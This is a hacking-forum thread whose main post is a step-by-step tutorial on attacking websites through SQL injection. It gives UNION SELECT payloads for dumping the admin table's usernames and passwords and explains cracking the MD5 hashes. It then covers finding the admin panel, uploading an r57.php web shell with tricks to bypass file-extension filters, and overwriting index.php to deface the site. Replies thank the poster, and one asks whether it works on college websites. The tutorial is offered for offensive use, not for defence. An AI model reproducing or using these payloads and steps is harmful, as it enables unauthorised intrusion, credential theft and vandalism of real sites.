Welcome to ZyberPH. Be one of us! Read first our VIP RULES. For more info and guide you. Read our FAQ

[DEFACING/SQLI] SQLI TUTORIAL

This include all cybersecurity, hacking tools, tips how to prevent from hacking and etc.
Post Reply
User avatar
FalsePromises
Member
Member
Posts: 56
Joined: Wed Apr 06, 2016 3:29 pm
Location: In the galaxy far far away ..

[DEFACING/SQLI] SQLI TUTORIAL

Post by FalsePromises »

[username|#b8b894|normal|2281]FalsePromises[/username]

SQLI TUTORIAL (c) Mr.M of GSH

1. First you need to find vulnerable website.

[Please login or register to view this link]

2. Now you need to find columns.

[Please login or register to view this link] order by 1-- ( no error )
[Please login or register to view this link] order by 2-- ( no error )
[Please login or register to view this link] order by 3-- ( no error )
[Please login or register to view this link] order by 4-- ( no error )
[Please login or register to view this link] order by 5-- ( no error )
[Please login or register to view this link] order by 6-- ( error )

Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39' at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39

3. Now Select columns
Columns is 5

[Please login or register to view this link] UNION ALL SELECT 1,2,3,4,5–

4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

[Please login or register to view this link] UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
[Please login or register to view this link] UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.

6. Finding Columns in the Table ADMINS.

[Please login or register to view this link] UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–

We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

[Please login or register to view this link] UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

[Please login or register to view this link] UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this [Please login or register to view this link]

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

[Please login or register to view this link]

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.

Congratulations you deface the website.
Top
User avatar
FalsePromises
Member
Member
Posts: 56
Joined: Wed Apr 06, 2016 3:29 pm
Location: In the galaxy far far away ..

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by FalsePromises »

For comments or violent reactions, kindly pm me or comment.
Top
User avatar
FalsePromises
Member
Member
Posts: 56
Joined: Wed Apr 06, 2016 3:29 pm
Location: In the galaxy far far away ..

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by FalsePromises »

So I can edit this post and add those things you suggest :) Thanks :D
Top
User avatar
cbokyan
Member
Member
Posts: 99
Joined: Thu Mar 24, 2016 8:10 pm

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by cbokyan »

ty po
Top
User avatar
FalsePromises
Member
Member
Posts: 56
Joined: Wed Apr 06, 2016 3:29 pm
Location: In the galaxy far far away ..

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by FalsePromises »

Your Welcome :D
[username|#b8b894|normal|2281]FalsePromises[/username] AT YOUR SERVICE!
Top
User avatar
Unknown User
Senior
Senior
Posts: 230
Joined: Sun Mar 27, 2016 5:12 pm
Location: Dark Underground Hacker[Root]

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by Unknown User »

:lol! Pang points ...
Top
mac_maharot
Member
Member
Posts: 23
Joined: Sat Apr 09, 2016 12:29 am
Location: caloocan

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by mac_maharot »

ty up
Top
MhengMheng17
Posts: 1
Joined: Sat Apr 09, 2016 2:42 am

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by MhengMheng17 »

Paps pwede mag tanong ? Magagamit din po ba yang tut na yan sa hackbar ? Sa android po . sensya na newbie po eh . want ko din matuto nyan tia paps
Top
Hachi
Posts: 1
Joined: Sat Apr 09, 2016 1:30 am

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by Hachi »

college websites can?
Top
N4M3L3S5
Beginner
Beginner
Posts: 5
Joined: Tue Apr 12, 2016 4:06 pm

Re: [DEFACING/SQLI] SQLI TUTORIAL

Post by N4M3L3S5 »

Up!
Top
Post Reply

Return to “Cybersecurity”